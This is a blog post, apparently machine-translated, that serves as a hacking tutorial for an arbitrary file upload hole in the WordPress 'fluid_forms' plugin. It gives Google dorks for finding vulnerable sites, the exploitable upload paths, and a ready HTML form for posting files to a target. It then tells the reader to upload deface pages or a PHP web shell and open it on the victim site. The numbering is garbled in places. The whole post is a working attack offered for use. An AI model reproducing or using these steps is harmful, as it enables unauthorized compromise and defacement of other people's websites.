Today is WordPress once it's gone? Hezhei joked, just want to learn martial arts then come to CMS
Wordpress all together
Requirements
Google Dork
+> inurl:"fluid_forms"
+> inurl:"/wp-content/plugins/fluid_forms/file-upload/"
+> index of /wp-content/plugins/fluid_forms/file-upload/
Exploit
/wp-content/plugins/fluid_forms/file-upload/server/php/
/wp-content/plugins/fluid_forms/file-upload/server/content/php/
How to do
1, Copy the top up to Google Search
ឧ, http://site.com/wp-content/plugins/fluid_forms/file-upload/index.php?=123
Switch to
ឧ, http://site.com/wp-content/plugins/fluid_forms/file-upload/server/php
ឧ, http://site.com/wp-content/plugins/fluid_forms/file-upload/server/content/php
4, Once changed, and if you see the site publishing such data, it means that it has a weak point
5, Please create an HTML file, then copy the code below into a folder
<form method="POST" action="www.target.com/wp-content/plugins/fluid_forms/file-upload/server/php/" enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>
7, open HTML, you will see upload places, upload files like Deface Image, Deface Page, Text or Shell by understanding. Know your
9, To open the file you have uploaded, please go to the link section
ឧ, www.site.com/wp-content/plugins/fluid_forms/file-upload/server/php/files/your shell.php
No comments:
Post a Comment